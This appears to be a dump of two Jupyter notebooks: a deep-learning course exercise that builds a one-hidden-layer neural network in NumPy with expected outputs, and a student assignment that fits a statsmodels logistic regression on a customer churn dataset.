The notation you will use is common in deep learning coding:\n - dW1 = $\\frac{\\partial \\mathcal{J} }{ \\partial W_1 }$\n - db1 = $\\frac{\\partial \\mathcal{J} }{ \\partial b_1 }$\n - dW2 = $\\frac{\\partial \\mathcal{J} }{ \\partial W_2 }$\n - db2 = $\\frac{\\partial \\mathcal{J} }{ \\partial b_2 }$\n \n!-->\n\n- Tips:\n - To compute dZ1 you'll need to compute $g^{[1]'}(Z^{[1]})$. Since $g^{[1]}(.)$ is the tanh activation function, if $a = g^{[1]}(z)$ then $g^{[1]'}(z) = 1-a^2$. So you can compute \n $g^{[1]'}(Z^{[1]})$ using `(1 - np.power(A1, 2))`.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: backward_propagation\n\ndef backward_propagation(parameters, cache, X, Y):\n \"\"\"\n Implement the backward propagation using the instructions above.\n \n Arguments:\n parameters -- python dictionary containing our parameters \n cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\".\n X -- input data of shape (2, number of examples)\n Y -- \"true\" labels vector of shape (1, number of examples)\n \n Returns:\n grads -- python dictionary containing your gradients with respect to different parameters\n \"\"\"\n m = X.shape[1]\n \n # First, retrieve W1 and W2 from the dictionary \"parameters\".\n ### START CODE HERE ### (≈ 2 lines of code)\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n ### END CODE HERE ###\n \n # Retrieve also A1 and A2 from dictionary \"cache\".\n ### START CODE HERE ### (≈ 2 lines of code)\n A1 = cache[\"A1\"]\n A2 = cache[\"A2\"]\n ### END CODE HERE ###\n \n # Backward propagation: calculate dW1, db1, dW2, db2. \n ### START CODE HERE ### (≈ 6 lines of code, corresponding to 6 equations on slide above)\n dZ2 = A2 - Y\n dW2 = 1/m * np.dot(dZ2, A1.T)\n db2 = 1/m * np.sum(dZ2, axis = 1, keepdims = True)\n dZ1 = np.dot(W2.T, dZ2) * (1 - np.power(A1, 2))\n dW1 = 1/m * np.dot(dZ1, X.T)\n db1 = 1/m * np.sum(dZ1, axis = 1, keepdims = True)\n ### END CODE HERE ###\n \n grads = {\"dW1\": dW1,\n \"db1\": db1,\n \"dW2\": dW2,\n \"db2\": db2}\n \n return grads", "_____no_output_____" ], [ "parameters, cache, X_assess, Y_assess = backward_propagation_test_case()\n\ngrads = backward_propagation(parameters, cache, X_assess, Y_assess)\nprint (\"dW1 = \"+ str(grads[\"dW1\"]))\nprint (\"db1 = \"+ str(grads[\"db1\"]))\nprint (\"dW2 = \"+ str(grads[\"dW2\"]))\nprint (\"db2 = \"+ str(grads[\"db2\"]))", "dW1 = [[ 0.00301023 -0.00747267]\n [ 0.00257968 -0.00641288]\n [-0.00156892 0.003893 ]\n [-0.00652037 0.01618243]]\ndb1 = [[ 0.00176201]\n [ 0.00150995]\n [-0.00091736]\n [-0.00381422]]\ndW2 = [[ 0.00078841 0.01765429 -0.00084166 -0.01022527]]\ndb2 = [[-0.16655712]]\n" ] ], [ [ "**Expected output**:\n\n\n\n<table style=\"width:80%\">\n <tr>\n <td>**dW1**</td>\n <td> [[ 0.00301023 -0.00747267]\n [ 0.00257968 -0.00641288]\n [-0.00156892 0.003893 ]\n [-0.00652037 0.01618243]] </td> \n </tr>\n \n <tr>\n <td>**db1**</td>\n <td> [[ 0.00176201]\n [ 0.00150995]\n [-0.00091736]\n [-0.00381422]] </td> \n </tr>\n \n <tr>\n <td>**dW2**</td>\n <td> [[ 0.00078841 0.01765429 -0.00084166 -0.01022527]] </td> \n </tr>\n \n\n <tr>\n <td>**db2**</td>\n <td> [[-0.16655712]] </td> \n </tr>\n \n</table> ", "_____no_output_____" ], [ "**Question**: Implement the update rule. Use gradient descent. You have to use (dW1, db1, dW2, db2) in order to update (W1, b1, W2, b2).\n\n**General gradient descent rule**: $ \\theta = \\theta - \\alpha \\frac{\\partial J }{ \\partial \\theta }$ where $\\alpha$ is the learning rate and $\\theta$ represents a parameter.\n\n**Illustration**: The gradient descent algorithm with a good learning rate (converging) and a bad learning rate (diverging). Images courtesy of Adam Harley.\n\n<img src=\"images/sgd.gif\" style=\"width:400;height:400;\"> <img src=\"images/sgd_bad.gif\" style=\"width:400;height:400;\">\n\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: update_parameters\n\ndef update_parameters(parameters, grads, learning_rate = 1.2):\n \"\"\"\n Updates parameters using the gradient descent update rule given above\n \n Arguments:\n parameters -- python dictionary containing your parameters \n grads -- python dictionary containing your gradients \n \n Returns:\n parameters -- python dictionary containing your updated parameters \n \"\"\"\n # Retrieve each parameter from the dictionary \"parameters\"\n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n ### END CODE HERE ###\n \n # Retrieve each gradient from the dictionary \"grads\"\n ### START CODE HERE ### (≈ 4 lines of code)\n dW1 = grads[\"dW1\"]\n db1 = grads[\"db1\"]\n dW2 = grads[\"dW2\"]\n db2 = grads[\"db2\"]\n ## END CODE HERE ###\n \n # Update rule for each parameter\n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = W1 - learning_rate * dW1\n b1 = b1 - learning_rate * db1\n W2 = W2 - learning_rate * dW2\n b2 = b2 - learning_rate * db2\n ### END CODE HERE ###\n \n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n \n return parameters", "_____no_output_____" ], [ "parameters, grads = update_parameters_test_case()\nparameters = update_parameters(parameters, grads)\n\nprint(\"W1 = \" + str(parameters[\"W1\"]))\nprint(\"b1 = \" + str(parameters[\"b1\"]))\nprint(\"W2 = \" + str(parameters[\"W2\"]))\nprint(\"b2 = \" + str(parameters[\"b2\"]))", "W1 = [[-0.00643025 0.01936718]\n [-0.02410458 0.03978052]\n [-0.01653973 -0.02096177]\n [ 0.01046864 -0.05990141]]\nb1 = [[ -1.02420756e-06]\n [ 1.27373948e-05]\n [ 8.32996807e-07]\n [ -3.20136836e-06]]\nW2 = [[-0.01041081 -0.04463285 0.01758031 0.04747113]]\nb2 = [[ 0.00010457]]\n" ] ], [ [ "**Expected Output**:\n\n\n<table style=\"width:80%\">\n <tr>\n <td>**W1**</td>\n <td> [[-0.00643025 0.01936718]\n [-0.02410458 0.03978052]\n [-0.01653973 -0.02096177]\n [ 0.01046864 -0.05990141]]</td> \n </tr>\n \n <tr>\n <td>**b1**</td>\n <td> [[ -1.02420756e-06]\n [ 1.27373948e-05]\n [ 8.32996807e-07]\n [ -3.20136836e-06]]</td> \n </tr>\n \n <tr>\n <td>**W2**</td>\n <td> [[-0.01041081 -0.04463285 0.01758031 0.04747113]] </td> \n </tr>\n \n\n <tr>\n <td>**b2**</td>\n <td> [[ 0.00010457]] </td> \n </tr>\n \n</table> ", "_____no_output_____" ], [ "### 4.4 - Integrate parts 4.1, 4.2 and 4.3 in nn_model() ####\n\n**Question**: Build your neural network model in `nn_model()`.\n\n**Instructions**: The neural network model has to use the previous functions in the right order.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: nn_model\n\ndef nn_model(X, Y, n_h, num_iterations = 10000, print_cost=False):\n \"\"\"\n Arguments:\n X -- dataset of shape (2, number of examples)\n Y -- labels of shape (1, number of examples)\n n_h -- size of the hidden layer\n num_iterations -- Number of iterations in gradient descent loop\n print_cost -- if True, print the cost every 1000 iterations\n \n Returns:\n parameters -- parameters learnt by the model. They can then be used to predict.\n \"\"\"\n \n np.random.seed(3)\n n_x = layer_sizes(X, Y)[0]\n n_y = layer_sizes(X, Y)[2]\n \n # Initialize parameters\n ### START CODE HERE ### (≈ 1 line of code)\n parameters = initialize_parameters(n_x, n_h, n_y)\n ### END CODE HERE ###\n \n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n \n ### START CODE HERE ### (≈ 4 lines of code)\n # Forward propagation. Inputs: \"X, parameters\". Outputs: \"A2, cache\".\n A2, cache = forward_propagation(X, parameters)\n \n # Cost function. Inputs: \"A2, Y, parameters\". Outputs: \"cost\".\n cost = compute_cost(A2, Y, parameters)\n \n # Backpropagation. Inputs: \"parameters, cache, X, Y\". Outputs: \"grads\".\n grads = backward_propagation(parameters, cache, X, Y)\n \n # Gradient descent parameter update. Inputs: \"parameters, grads\". Outputs: \"parameters\".\n parameters = update_parameters(parameters, grads)\n \n ### END CODE HERE ###\n \n # Print the cost every 1000 iterations\n if print_cost and i % 1000 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n\n return parameters", "_____no_output_____" ], [ "X_assess, Y_assess = nn_model_test_case()\nparameters = nn_model(X_assess, Y_assess, 4, num_iterations=10000, print_cost=True)\nprint(\"W1 = \" + str(parameters[\"W1\"]))\nprint(\"b1 = \" + str(parameters[\"b1\"]))\nprint(\"W2 = \" + str(parameters[\"W2\"]))\nprint(\"b2 = \" + str(parameters[\"b2\"]))", "Cost after iteration 0: 0.692739\nCost after iteration 1000: 0.000218\nCost after iteration 2000: 0.000107\nCost after iteration 3000: 0.000071\nCost after iteration 4000: 0.000053\nCost after iteration 5000: 0.000042\nCost after iteration 6000: 0.000035\nCost after iteration 7000: 0.000030\nCost after iteration 8000: 0.000026\nCost after iteration 9000: 0.000023\nW1 = [[-0.65848169 1.21866811]\n [-0.76204273 1.39377573]\n [ 0.5792005 -1.10397703]\n [ 0.76773391 -1.41477129]]\nb1 = [[ 0.287592 ]\n [ 0.3511264 ]\n [-0.2431246 ]\n [-0.35772805]]\nW2 = [[-2.45566237 -3.27042274 2.00784958 3.36773273]]\nb2 = [[ 0.20459656]]\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:90%\">\n\n<tr> \n <td> \n **cost after iteration 0**\n </td>\n <td> \n 0.692739\n </td>\n</tr>\n\n<tr> \n <td> \n <center> $\\vdots$ </center>\n </td>\n <td> \n <center> $\\vdots$ </center>\n </td>\n</tr>\n\n <tr>\n <td>**W1**</td>\n <td> [[-0.65848169 1.21866811]\n [-0.76204273 1.39377573]\n [ 0.5792005 -1.10397703]\n [ 0.76773391 -1.41477129]]</td> \n </tr>\n \n <tr>\n <td>**b1**</td>\n <td> [[ 0.287592 ]\n [ 0.3511264 ]\n [-0.2431246 ]\n [-0.35772805]] </td> \n </tr>\n \n <tr>\n <td>**W2**</td>\n <td> [[-2.45566237 -3.27042274 2.00784958 3.36773273]] </td> \n </tr>\n \n\n <tr>\n <td>**b2**</td>\n <td> [[ 0.20459656]] </td> \n </tr>\n \n</table> ", "_____no_output_____" ], [ "### 4.5 Predictions\n\n**Question**: Use your model to predict by building predict().\nUse forward propagation to predict results.\n\n**Reminder**: predictions = $y_{prediction} = \\mathbb 1 \\text{{activation > 0.5}} = \\begin{cases}\n 1 & \\text{if}\\ activation > 0.5 \\\\\n 0 & \\text{otherwise}\n \\end{cases}$ \n \nAs an example, if you would like to set the entries of a matrix X to 0 and 1 based on a threshold you would do: ```X_new = (X > threshold)```", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: predict\n\ndef predict(parameters, X):\n \"\"\"\n Using the learned parameters, predicts a class for each example in X\n \n Arguments:\n parameters -- python dictionary containing your parameters \n X -- input data of size (n_x, m)\n \n Returns\n predictions -- vector of predictions of our model (red: 0 / blue: 1)\n \"\"\"\n \n # Computes probabilities using forward propagation, and classifies to 0/1 using 0.5 as the threshold.\n ### START CODE HERE ### (≈ 2 lines of code)\n A2, cache = forward_propagation(X, parameters)\n predictions = np.round(A2)\n ### END CODE HERE ###\n \n return predictions", "_____no_output_____" ], [ "parameters, X_assess = predict_test_case()\n\npredictions = predict(parameters, X_assess)\nprint(\"predictions mean = \" + str(np.mean(predictions)))", "predictions mean = 0.666666666667\n" ] ], [ [ "**Expected Output**: \n\n\n<table style=\"width:40%\">\n <tr>\n <td>**predictions mean**</td>\n <td> 0.666666666667 </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "It is time to run the model and see how it performs on a planar dataset. Run the following code to test your model with a single hidden layer of $n_h$ hidden units.", "_____no_output_____" ] ], [ [ "# Build a model with a n_h-dimensional hidden layer\nparameters = nn_model(X, Y, n_h = 4, num_iterations = 10000, print_cost=True)\n\n# Plot the decision boundary\nplot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)\nplt.title(\"Decision Boundary for hidden layer size \" + str(4))", "Cost after iteration 0: 0.693048\nCost after iteration 1000: 0.288083\nCost after iteration 2000: 0.254385\nCost after iteration 3000: 0.233864\nCost after iteration 4000: 0.226792\nCost after iteration 5000: 0.222644\nCost after iteration 6000: 0.219731\nCost after iteration 7000: 0.217504\nCost after iteration 8000: 0.219471\nCost after iteration 9000: 0.218612\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:40%\">\n <tr>\n <td>**Cost after iteration 9000**</td>\n <td> 0.218607 </td> \n </tr>\n \n</table>\n", "_____no_output_____" ] ], [ [ "# Print accuracy\npredictions = predict(parameters, X)\nprint ('Accuracy: %d' % float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100) + '%')", "Accuracy: 90%\n" ] ], [ [ "**Expected Output**: \n\n<table style=\"width:15%\">\n <tr>\n <td>**Accuracy**</td>\n <td> 90% </td> \n </tr>\n</table>", "_____no_output_____" ], [ "Accuracy is really high compared to Logistic Regression. The model has learnt the leaf patterns of the flower! Neural networks are able to learn even highly non-linear decision boundaries, unlike logistic regression. \n\nNow, let's try out several hidden layer sizes.", "_____no_output_____" ], [ "### 4.6 - Tuning hidden layer size (optional/ungraded exercise) ###\n\nRun the following code. It may take 1-2 minutes. You will observe different behaviors of the model for various hidden layer sizes.", "_____no_output_____" ] ], [ [ "# This may take about 2 minutes to run\n\nplt.figure(figsize=(16, 32))\nhidden_layer_sizes = [1, 2, 3, 4, 5, 20, 50]\nfor i, n_h in enumerate(hidden_layer_sizes):\n plt.subplot(5, 2, i+1)\n plt.title('Hidden Layer of size %d' % n_h)\n parameters = nn_model(X, Y, n_h, num_iterations = 5000)\n plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)\n predictions = predict(parameters, X)\n accuracy = float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100)\n print (\"Accuracy for {} hidden units: {} %\".format(n_h, accuracy))", "Accuracy for 1 hidden units: 67.5 %\nAccuracy for 2 hidden units: 67.25 %\nAccuracy for 3 hidden units: 90.75 %\nAccuracy for 4 hidden units: 90.5 %\nAccuracy for 5 hidden units: 91.25 %\nAccuracy for 20 hidden units: 90.0 %\nAccuracy for 50 hidden units: 90.25 %\n" ] ], [ [ "**Interpretation**:\n- The larger models (with more hidden units) are able to fit the training set better, until eventually the largest models overfit the data. \n- The best hidden layer size seems to be around n_h = 5. Indeed, a value around here seems to fits the data well without also incurring noticeable overfitting.\n- You will also learn later about regularization, which lets you use very large models (such as n_h = 50) without much overfitting. ", "_____no_output_____" ], [ "**Optional questions**:\n\n**Note**: Remember to submit the assignment by clicking the blue \"Submit Assignment\" button at the upper-right. \n\nSome optional/ungraded questions that you can explore if you wish: \n- What happens when you change the tanh activation for a sigmoid activation or a ReLU activation?\n- Play with the learning_rate. What happens?\n- What if we change the dataset? (See part 5 below!)", "_____no_output_____" ], [ "<font color='blue'>\n**You've learnt to:**\n- Build a complete neural network with a hidden layer\n- Make a good use of a non-linear unit\n- Implemented forward propagation and backpropagation, and trained a neural network\n- See the impact of varying the hidden layer size, including overfitting.", "_____no_output_____" ], [ "Nice work! ", "_____no_output_____" ], [ "## 5) Performance on other datasets", "_____no_output_____" ], [ "If you want, you can rerun the whole notebook (minus the dataset part) for each of the following datasets.", "_____no_output_____" ] ], [ [ "# Datasets\nnoisy_circles, noisy_moons, blobs, gaussian_quantiles, no_structure = load_extra_datasets()\n\ndatasets = {\"noisy_circles\": noisy_circles,\n \"noisy_moons\": noisy_moons,\n \"blobs\": blobs,\n \"gaussian_quantiles\": gaussian_quantiles}\n\n### START CODE HERE ### (choose your dataset)\ndataset = \"noisy_moons\"\n### END CODE HERE ###\n\nX, Y = datasets[dataset]\nX, Y = X.T, Y.reshape(1, Y.shape[0])\n\n# make blobs binary\nif dataset == \"blobs\":\n Y = Y%2\n\n# Visualize the data\nplt.scatter(X[0, :], X[1, :], c=Y, s=40, cmap=plt.cm.Spectral);", "_____no_output_____" ] ], [ [ "Congrats on finishing this Programming Assignment!\n\nReference:\n- http://scs.ryerson.ca/~aharley/neural-networks/\n- http://cs231n.github.io/neural-networks-case-study/", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ] ]
e72eb844928b279123e59e515e861956c642218b
10,499
ipynb
Jupyter Notebook
workshop/Welcome.ipynb
lvthillo/retail-demo-store
20a42c3fcde7fa27bf528adb6bf8bdca5642ef81
[ "MIT-0" ]
null
null
null
workshop/Welcome.ipynb
lvthillo/retail-demo-store
20a42c3fcde7fa27bf528adb6bf8bdca5642ef81
[ "MIT-0" ]
null
null
null
workshop/Welcome.ipynb
lvthillo/retail-demo-store
20a42c3fcde7fa27bf528adb6bf8bdca5642ef81
[ "MIT-0" ]
null
null
null
68.175325
638
0.712925
[ [ [ "# Welcome to the Retail Demo Store Workshops\n\nThe workshops in this project are designed to walk you through incrementally adding functionality to the base Retail Demo Store application. Some of the workshops build on each other so it is recommended to follow the workshops in order unless otherwise instructed as part of an organized event or workshop.\n\n**IMPORTANT: The workshops are implemented using Jupyter notebooks that are designed to be executed from a SageMaker Notebook instance in an AWS account where the Retail Demo Store has been deployed. Therefore, the notebooks may not be fully functional outside AWS such as on your local machine. The Retail Demo Store's deployment templates will create the SageMaker Notebook instance and preload the workshop notebooks for you.**\n\n## Retail Demo Store Architecture\n\nBefore opening and walking through the workshops, let's get familiar with the Retail Demo Store architecture and infrastructure deployed into your AWS account. Establishing this foundation will make the workshops more understandable and relatable back to the functionality being enhanced.\n\nThe core of the Retail Demo Store is a polyglot microservice architecture deployed as a collection of RESTful web services in [Amazon Elastic Container Service](https://aws.amazon.com/ecs/) (ECS). Several AWS managed services are leveraged to provide build, deployment, authentication, messaging, search, and personalization capabilities. \n\n![Retail Demo Store Architecture](./images/retaildemostore-architecture.png)\n\n### Microservices\n\nThe **Web UI** container service (located in ECS rectangle in the above diagram) is used to provide the user interface for the Retail Demo Store. It uses the [Vue.js](https://vuejs.org/) JavaScript framework for UI components, [Axios](https://github.com/axios/axios) to communicate with back-end web service APIs, and [AWS Amplify](https://aws.amazon.com/amplify/) to integrate with [Amazon Cognito](https://aws.amazon.com/cognito/) for authentication and [Amazon Pinpoint](https://aws.amazon.com/pinpoint/) for capturing user behavior and clickstream data.\n\nThe **Users**, **Products**, **Carts**, and **Orders** web services provide access to retrieving and updating each respective entity type. These services are built with the [Golang](https://golang.org/) programming languge and provide very basic implementations.\n\nThe **Search** service leverages [Amazon Elasticsearch](https://aws.amazon.com/elasticsearch-service/) to power user-entered product queries. The first workshop walks you through creating and populating the index.\n\nThe **Recommendations** service provides user and related product recommendations and personalized ranking of products. In its default launch state, the service lacks the ability to provide personalization. The second workshop steps you through how to use [Amazon Personalize](https://aws.amazon.com/personalize/) to activate the personalization capabilities in the Recommendations service.\n\n### Support Services\n\nRetail Demo Store's microservices and workshops make extensive use of [AWS Cloud Map](https://aws.amazon.com/cloud-map/) to discover the private addresses of microservices and [AWS Systems Manager Parameter Store](https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-parameter-store.html) to store and discover important system configuration values that effect how the services behave. For example, once the Amazon Personalize campaigns are built in the Personalization workshop, the ARNs are saved as SSM Parameters that the Recommendations microservice uses to retrieve recommendations from Personalize.\n\nYou are encouraged to explore these services in the AWS console as you work through the workshops to see how they're utilized by the Retail Demo Store.\n\n### Build and Deployment Pipeline\n\nRetail Demo Store uses [AWS CodePipeline](https://aws.amazon.com/codepipeline/) to automatically build and deploy the microservices when a change is detected in the code repository (AWS CodeCommit or GitHub).\n\n### Source Code\n\nUnless you deployed the Retail Demo Store via a linked GitHub repository (in which case you already have access to the source code), you can view all source code for the Retail Demo Store's microservices and notebooks in the [AWS CodeCommit](https://aws.amazon.com/codecommit/) Git repositories deployed in this AWS account.\n\n## User Interface Instructions\n\nWhen the Retail Demo Store was deployed in your account by CloudFormation, a load balancer was created that can be used to access the Web User Interface service. The CloudFormation template provides the URL of the load balancer as an Output parameter. Browse to the CloudFormation console in this AWS account, click on the Retail Demo Store's stack, then on the \"Outputs\" tab, and finally locate the key named \"WebURL\". Open this URL in a separate web browser tab/window.\n\n![CloudFormation Outputs](./images/cfn-webui-outputs.png)\n\nWhen you access the WebURL you should see the Retail Demo Store home page.\n\n![Retail Demo Store Home Page](./images/retaildemostore-home.png)\n\n### Create Retail Demo Store User Account\n\n#### 1. Access Create Account\n\nClick the \"Sign In\" button and then the \"Create account\" link on the sign in view.\n\n![Retail Demo Store Create Account](./images/retaildemostore-create-acct-link.png)\n\n#### 2. Complete New Account Form\n\nComplete all fields and be sure to use your actual mobile phone number, if possible, so that you can receive an account confirmation code via SMS. The user create and confirmation process is provided by Amazon Cognito. If you don't receive the SMS or had to use a fake phone number, you can manually confirm your user account by browsing to Amazon Cognito in this AWS account then select User Pools > Users, find your user and confirm.\n\n![Retail Demo Store Create Account](./images/retaildemostore-create-acct.png)\n\n#### 3. Confirm Account\n\nOnce you receive your confirmation code from Cognito via SMS, enter it here.\n\n![Retail Demo Store Confirm Account](./images/retaildemostore-confirm.png)\n\n#### 4. Sign In to Your Account\n\n![Retail Demo Store Sign In](./images/retaildemostore-signin.png)\n\n#### 5. Emulate Shopper\n\nThe Retail Demo Store provides the ability for you to emulate one of the existing shoppers in the system. This is useful when you want to test the product and search personalization capabilities (after the search and personalization workshops are completed).\n\nClick on your user name in upper right corner and then click on Profile to access the Profile page.\n\n![Retail Demo Store User Profile](./images/retaildemostore-user-menu.png)\n\nTo emulate a shopper, select a shopper from the drop down and click \"Save Changes\". Once saved, you can browse the storefront. This will be covered in more detail in the workshops.\n\n![Retail Demo Store Emulate Shopper](./images/retaildemostore-emulate.png)\n\n## Workshop Instructions\n\nEach workshop is implemented as a [Jupyter Notebook](https://jupyter.org/).\n\n> The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more.\n\nOpen each notebook and follow along by reading and executing the cells sequentially. Use the \"run\" (\">\") button at the top of the notebook page to execute each cell.\n\n![Jupyter Notebook Play](./images/notebook-play.png)\n\n### Search Workshop\n\nThe [Search Workshop](./0-StartHere/Search.ipynb) will walk you through the process of creating an index in Amazon Elasticsearch and loading the index with information on the products in the Retail Demo Store. The Retail Demo Store's Search service uses this index to perform queries based on user-entered search terms.\n\n**[Open Workshop](./0-StartHere/Search.ipynb)**\n\n### Personalization Workshop\n\nThe [Personalization Workshop](./1-Personalization/personalize.ipynb) will walk you through the process of training and deploying machine learning models using Amazon Personalize to add product recommendations and personalized ranking to the Retail Demo Store. The Retail Demo Store's Recommendation service provides these features.\n\n**[Open Workshop](./1-Personalization/personalize.ipynb)**\n\n### Forecasting Workshop\n\nComing soon!\n\n### Experimentation Workshop\n\nThe [Experimentation Workshop](./3-Experimentation/3.1-Overview.ipynb) demonstrates how to add experimentation to the Retail Demo Store to evaluate the performance of different testing techniques. Three different approaches to experimentation are implemented including A/B testing, interleaved recommendation testing, and multi-armed bandit testing.\n\n**[Open Workshop](./3-Experimentation/3.1-Overview.ipynb)**", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e72ec0a7572751beb8bb54d34280bd664f2c5183
79,773
ipynb
Jupyter Notebook
module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb
BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data
01e0a55ff626472fe68ba8981c1fa9f5bd12c3ed
[ "MIT" ]
1
2019-07-15T19:11:09.000Z
2019-07-15T19:11:09.000Z
module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb
BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data
01e0a55ff626472fe68ba8981c1fa9f5bd12c3ed
[ "MIT" ]
null
null
null
module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb
BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data
01e0a55ff626472fe68ba8981c1fa9f5bd12c3ed
[ "MIT" ]
null
null
null
60.479909
23,092
0.563411
[ [ [ "<a href=\"https://colab.research.google.com/github/BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data/blob/master/module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# Lambda School Data Science - A First Look at Data\n\n", "_____no_output_____" ], [ "## Lecture - let's explore Python DS libraries and examples!\n\nThe Python Data Science ecosystem is huge. You've seen some of the big pieces - pandas, scikit-learn, matplotlib. What parts do you want to see more of?", "_____no_output_____" ] ], [ [ "# TODO - we'll be doing this live, taking requests\n# and reproducing what it is to look up and learn things\n\ndrinks = ['coke', 'sprite', 'juice', 'water']", "_____no_output_____" ] ], [ [ "## Assignment - now it's your turn\n\nPick at least one Python DS library, and using documentation/examples reproduce in this notebook something cool. It's OK if you don't fully understand it or get it 100% working, but do put in effort and look things up.", "_____no_output_____" ] ], [ [ "# TODO - your code here\n# Use what we did live in lecture as an example", "_____no_output_____" ], [ "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.discrete.discrete_model as smdis\nimport statsmodels.stats.outliers_influence as outliers\nfrom google.colab import files", "_____no_output_____" ], [ "uploaded = files.upload() \n#csv used - https://sds-platform-private.s3-us-east-2.amazonaws.com/uploads/P12-Churn-Modelling-Test-Data.csv", "_____no_output_____" ], [ "for fn in uploaded.keys():\n print('User uploaded file \"{name}\" with length {length} bytes'.format(\n name=fn, length=len(uploaded[fn])))", "User uploaded file \"P12-Churn-Modelling-Test-Data.csv\" with length 69498 bytes\n" ], [ "df = pd.read_csv(\"P12-Churn-Modelling-Test-Data.csv\", index_col=None)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df_y = df['Exited']\ndf_x = df.drop(['Exited'], axis = 1)", "_____no_output_____" ], [ "dummy = pd.get_dummies(df_x['Gender'])\ndf_x = dummy.join(df_x)\ndummy = pd.get_dummies(df_x['Geography'])\ndf_x = dummy.join(df_x)", "_____no_output_____" ], [ "df_x.head()", "_____no_output_____" ], [ "df_x = df_x.drop(['Gender', 'Female', 'France', 'Geography'], axis =1)\ndf_x.head()", "_____no_output_____" ], [ "df_x = sm.add_constant(df_x)\ndf_x.head()", "/usr/local/lib/python3.6/dist-packages/numpy/core/fromnumeric.py:2389: FutureWarning: Method .ptp is deprecated and will be removed in a future version. Use numpy.ptp instead.\n return ptp(axis=axis, out=out, **kwargs)\n" ], [ "df_x = df_x.drop(['RowNumber', 'CustomerId', 'Surname'], axis = 1)\ndf_x.head()", "_____no_output_____" ], [ "plt.scatter(df_x['CreditScore'], df_x['Age'])", "_____no_output_____" ], [ "model = smdis.Logit(df_y, df_x).fit()", "Optimization terminated successfully.\n Current function value: 0.495422\n Iterations 6\n" ], [ "model.summary()", "_____no_output_____" ] ], [ [ "### Assignment questions\n\nAfter you've worked on some code, answer the following questions in this text block:\n\n1. Describe in a paragraph of text what you did and why, as if you were writing an email to somebody interested but nontechnical.\n\n2. What was the most challenging part of what you did?\n\n3. What was the most interesting thing you learned?\n\n4. What area would you like to explore with more time?\n\nIn the above code, I took a dataset and from it, I made a graph to show the relationship between age and credit score in both Germany and Spain, I also created a model to help predict future data based on patterns in the current dataset. The most challenging part of this assignment for me was learning about a Python library I haven't come across thus far. This also tied into what was the most interesting thing I learned completing this assignment. With more time I would explore much more Python libraries because the more tools I can have at my disposal the more possibilities there will be with my code.\n\n", "_____no_output_____" ], [ "## Stretch goals and resources\n\nFollowing are *optional* things for you to take a look at. Focus on the above assignment first, and make sure to commit and push your changes to GitHub (and since this is the first assignment of the sprint, open a PR as well).\n\n- [pandas documentation](https://pandas.pydata.org/pandas-docs/stable/)\n- [scikit-learn documentation](http://scikit-learn.org/stable/documentation.html)\n- [matplotlib documentation](https://matplotlib.org/contents.html)\n- [Awesome Data Science](https://github.com/bulutyazilim/awesome-datascience) - a list of many types of DS resources\n\nStretch goals:\n\n- Find and read blogs, walkthroughs, and other examples of people working through cool things with data science - and share with your classmates!\n- Write a blog post (Medium is a popular place to publish) introducing yourself as somebody learning data science, and talking about what you've learned already and what you're excited to learn more about.", "_____no_output_____" ] ] ]
